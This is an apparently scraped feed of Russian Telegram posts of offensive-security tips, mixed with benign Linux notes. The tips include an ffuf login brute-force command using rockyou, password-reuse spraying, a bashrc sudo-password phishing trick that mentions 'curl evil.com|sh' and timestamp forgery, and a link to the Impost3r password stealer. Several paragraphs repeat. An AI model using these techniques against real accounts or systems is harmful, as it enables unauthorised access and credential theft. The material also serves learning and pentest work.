#offensive #burp #ffuf #web #bruteforce
Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.
Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу
Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.
Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу
ffuf -w ./Wordlists/rockyou.txt -X POST -u https://somepage.com/login --data 'username=admin&password=FUZZ'
#offensive #web #python
Приложения на python, особенно использующие фласк часто подвержены race condition
Приложения на python, особенно использующие фласк часто подвержены race condition
#pipeline #linux
Иногда нужно вызвать какую-то команду для каждой строчки из файла. Например есть файл с кучей IP или доменов, а мы хотим запросить whois для каждого, можно воспользоваться xargs:
- тут строчка из файла подставляется в конец, что не всегда подходит (
Иногда нужно вызвать какую-то команду для каждой строчки из файла. Например есть файл с кучей IP или доменов, а мы хотим запросить whois для каждого, можно воспользоваться xargs:
cat ips.txt | xargs -I '{}' sh -c 'whois {}'
Есть вариант покороче, но не всегда подходит:cat ips.txt | xargs -n1 whois
- тут строчка из файла подставляется в конец, что не всегда подходит (
ssh <строчка>@host или ffuf -u <хост>/?FUZZ=1 )#offensive #note
Если получилось подобрать пароль к одному пользователю - стоит проверить такой же пароль для остальных пользователей (веерная брутфорс атака).
Иногда у пользователя больше одного аккаунта в системе - один может быть служебным, а другой - для работы с документами. Естественно, пароли для удобства ставят одинаковые
Если получилось подобрать пароль к одному пользователю - стоит проверить такой же пароль для остальных пользователей (веерная брутфорс атака).
Иногда у пользователя больше одного аккаунта в системе - один может быть служебным, а другой - для работы с документами. Естественно, пароли для удобства ставят одинаковые
#codeanalysis
Удивительно, но парсеров для C (рабочих) почти нет.
Хорошо что у clang есть биндинги, и парсить ast можно даже через питон
Удивительно, но парсеров для C (рабочих) почти нет.
Хорошо что у clang есть биндинги, и парсить ast можно даже через питон
Forwarded from vx-underground
Today VirusTotal announced that each sample uploaded will be accompanied by "Code Insight". Code Insight uses Sec-PaLM, one of the generative AI models by Google, to explain what the malicious binary is doing.
Code Insight is available to all users.
tl;dr "they took my job"
Code Insight is available to all users.
tl;dr "they took my job"
😢2
Forwarded from Записки админа
🛠 Встала, вроде бы, простая задачка - получить дамп трафика для конкретного приложения в Linux.
Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...
📗 https://sysadmin.pm/nsntrace/
#network #trace #pcap
Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...
📗 https://sysadmin.pm/nsntrace/
#network #trace #pcap
👍1
Полезная штука для #privesc
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
curl evil.com|sh, или через эксплойт), можно с её помощью попытаться зафишить пароль. Вообще, bashrc и подобные файлы редко регулярно проверяются, а таймштамп можно подменить через touch -a -m -t <timestamp> <file>Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
sudo, и не параноить по поводу bashrc?😢1
Forwarded from Cybred
https://github.com/ph4ntonn/Impost3r/
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
GitHub
GitHub - ph4ntonn/Impost3r: 👻Impost3r -- A linux password thief
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
Forwarded from Нетипичный Безопасник (Мефодий Келевра) (MiF)
Находка дня https://weakpass.com/
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Forwarded from $NATCH | Global Digital Bank
Итак, мы готовы объявить победителей нашего конкурса по взлому онлайн банка!
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🔥8👏1